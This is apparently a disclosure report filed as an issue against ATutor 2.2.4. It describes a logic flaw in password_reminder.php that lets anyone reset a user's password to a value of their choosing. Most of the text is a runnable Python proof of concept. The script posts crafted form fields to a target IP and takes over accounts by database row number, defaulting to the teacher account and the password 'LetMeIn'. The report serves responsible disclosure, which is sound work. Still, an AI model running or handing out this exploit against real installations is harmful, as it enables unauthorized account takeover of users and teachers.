Arbitrary Password Reset via password_reminder.php #192
Description
In version 2.2.4, it's currently possible to arbitrarily change the user password to an attacker controlled value. This is caused by a logic flaw when g, id, h, form_password_hidden, and form_change are all set. CVE has been submitted for the issue. POC is below. Please let me know if you have questions or concerns regarding this:
import hashlib, sys, requests
def force_password_change(ip, id, password):
data = {
"g" : 9999999999,
"id" : id,
"h" : 0,
"form_password_hidden" : hashlib.sha1(password).hexdigest(),
"form_change" : ""
}
url = "http://%s/ATutor/password_reminder.php" % (ip)
print("(*) Issuing password reset to URL: %s" % url)
requests.post(url, data)
def main():
if len(sys.argv) < 3:
print('(+) Utility for changing a target users password given the database row number.')
print('(+) If no password is specified, LetMeIn will be used. Default index for teacher account is 1.')
print('(+) usage: %s <index> <target_ip> [password]' % sys.argv[0])
print('(+) eg: %s 1 192.168.1.2' % sys.argv[0])
sys.exit(-1)
id = sys.argv[1]
ip = sys.argv[2]
password = "LetMeIn"
if len(sys.argv) > 3:
password = sys.argv[3]
force_password_change(ip, id, password)
print("(+) Operation complete. Manually test to see if the password changed.")
if __name__ == "__main__":
main()